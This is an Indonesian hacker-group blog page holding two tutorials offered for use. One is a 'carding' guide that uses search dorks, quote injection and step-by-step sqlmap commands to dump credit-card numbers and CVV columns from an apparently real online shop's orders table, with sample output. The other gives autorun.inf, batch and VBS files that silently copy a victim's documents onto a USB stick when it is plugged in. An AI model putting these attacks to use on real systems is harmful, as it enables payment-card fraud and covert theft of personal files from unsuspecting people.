CYBER KEDIRI TEAM

BAHAGIA ITU SEDERHANA

CYBER KEDIRI TEAM

Lagu pula Unix-lah sistem operasi internet, Meski tentu bisa belajar menggunakan internet tanpa mengenal Unix, tapi anda tak akan mampu menjadi hacker internet tanpa mengenal Unix. Trust me, Use Unix, Unix Is Better..

CYBER KEDIRI TEAM

Learn Security | Learn Programming | Use Linux | Debugging Program | Write a Code | Share to your Community. ( I Think It's The Way Of Hacker ) .

CYBER KEDIRI TEAM

Befikirlah sebagai seorang pemula, maka dunia ini akan terbuka bagimu..

CYBER KEDIRI TEAM

Hacker tidak bersedia menghabiskan waktu dengan orang-orang yang hanya bersikap seperti hacker, tapi hacker memuja keahlian - terutama keahlian dalam dunia hacking dan sekuritas, juga keahlian dibidang apapun..

Sunday, October 15, 2017

CARDING WITH SQLMAP 2017

By  October 15, 2017  1 comment
AssalamualaikumWr.Wb oke kembali lagi bersama saya. saya disini ada sedikit ilmu tentang Tutorial Carding ( menggunakan sqlmap ) - Sore ini saya membuat tutorial karena teman oke langsung saja ke tkp

Pertama kita siapkan tools" nya dahulu :
1. sqlmap
2. dork carding ( bisa cari di google ) / download
3. sqli scanner :

Pertama ,ambil dork lalu scan menggunakan sqli scanner :


Setelah itu kita test URL target dengan memberi kan tanda petik di depan "="
http://www.zite.com/merchandise/index.php?cat=268
menjadi :
http://www.zite.com/merchandise/index.php?cat='268
Nah, web tersebut error saat kita inject ,


Kedua, kita eksekusi menggunakan sqlmap :
berikut perintahnya : ./sqlmap.py -u link --dbs
Disini kita mendapatkan 3 database :


[*] balboast_gkgbu
[*] balboast_gkgcart
[*] information_schema
Setelah itu kita dump database nya untuk mencari table ,
gunakan perintah : ./sqlmap.py -u link -D namadatabase --tables ( disini saya coba database "balboast_gkgcart" )


nah, saya dapat tables nya :

Database: balboast_gkgcart                                                                                                                                                                     
[88 tables]
+-----------------------+
| amanu                 |
| categories            |
| clients               |
| components            |
| config                |
| config_groups         |
| customers             |
| form_data             |
| form_fields           |
| forms                 |
| geo                   |
| groups                |
| item_amanu            |
| item_cat              |
| item_files            |
| item_files_customer   |
| item_options          |
| item_options_linked   |
| item_options_values   |
| item_related          |
| item_thread           |
| item_thread_old       |
| items                 |
| items_addphoto        |
| items_item_files      |
| items_packages        |
| languages             |
| logs                  |
| mailinglist           |
| mailinglist_cat       |
| mailinglist_members   |
| manu                  |
| news                  |
| news_cat              |
| news_news_cat         |
| orders                |
| photos                |
| photos_cat            |
| pic_gallery           |
| ship_prices           |
| ship_zones            |
| sites                 |
| sites_components      |
| thread                |
| thread_gel            |
| thread_items          |
| ups                   |
| ups_packaging         |
| ups_pickup            |
| ups_service           |
| ups_units             |
| users                 |
| users_access          |
| users_groups          |
| users_spu             |
| users_spu_values      |
| zones                 |
+-----------------------+
[09:47:41] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/balboastitch.com'

Kita pilih di bagian "orders" . Kita ambil columns nya .
Gunakan perintah : sqlmap.py -u link -D namadatabase -T namatable --columns

Maka akan muncul seperti ini :


Table: orders
[18 columns]
+-----------------+-------------+
| Column          | Type        |
+-----------------+-------------+
| cart_id         | varchar(15) |
| cc_ex_month     | tinyint(4)  |
| cc_ex_year      | int(11)     |
| cc_number       | varchar(30) |
| cc_type         | varchar(20) |
| customer_id     | int(11)     |
| cvv2            | varchar(20) |
| date            | datetime    |
| id              | int(11)     |
| ipaddress       | varchar(25) |
| payment_method  | varchar(15) |
| shipping        | float(8,2)  |
| shipping_method | varchar(5)  |
| status          | tinyint(4)  |
| subtotal        | float(8,2)  |
| tax             | float(8,2)  |
| text            | text        |
| total           | float(8,2)  |
+-----------------+-------------+
Nah :D sudah muncul, selesai sudah..tinggal kita dump 1 per 1 columnsnya bro :)
Caranya : ./sqlmap.py -u link -D namadatabase -T namatable --dump

contoh : ./sqlmap.py -u link -D namadatabase -T namatable -C cc_number --dump
maka nanti cc number akan muncul walau proses agak lama .
SEKIAN DAN TERIMA KASIH 
Gunakan Dengan Bijak
 JSLinux
Read More

Tuesday, October 10, 2017

PRO HACKING : CARA MENCURI DATA DENGAN FLASHDISK

By  October 10, 2017  2 comments
lama gw kagak posting sahabat cyber kediri ....
karna gw habis sidang scriptsi bukan script deface ya ;v
kali ini gw akan ajar kan cara hack satelite ;v
eh maksut saya curi data dengan flasdik murahan  
langsung saja gk usah basa basi

Langkah ke-1
Buka Notepad copy dan paste kode dibawah ini.
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
Kemudian simpanlah di flashdisk dengan nama: autorun.inf
Langkah ke-2
Buka Notepad lagi dan copas kode berikut:
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\My Documents\*.doc" "%drive%\all\doc"
@echo off
cls
Simpan di flashdisk anda dengan nama:file.bat
Langkah ke-3
Buka Notepad lagi dan copas kode berikut:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
Simpan di flashdisk anda dengan nama:invisible.vbs
Langkah ke-4
Buka Notepad lagi dan copas lagi kode berikut:
wscript.exe \invisible.vbs file.bat
Simpan di flashdisk anda dengan nama:launch.bat
Ok, sekarang pastikan ke-4 file tadi yang telah kita buat berada di flashdisk kita, dan buatlah folder baru dengan nama all untuk menyimpan hasil curian kita di komputer teman tadi, dimana perintah: %backupcmd% “%USERPROFILE%\My Documents\*.doc” “%drive%\all\doc”, akan menyalin semua file ber-ekstensi .doc kedalam folder “all/doc” yang berada di flashdisk kita secara otomatis waktu kita mencolokkan flashdisk kita dikomputernya, ataupun dia sendiri yang mencolokkannya dikomputernya sendiri.

Sebelum mencoba mencuri file dikomputer teman, coba dulu flashdisk kita dikomputer kita sendiri, lihat apakah bekerja dengan baik. Selamat mencoba
Read More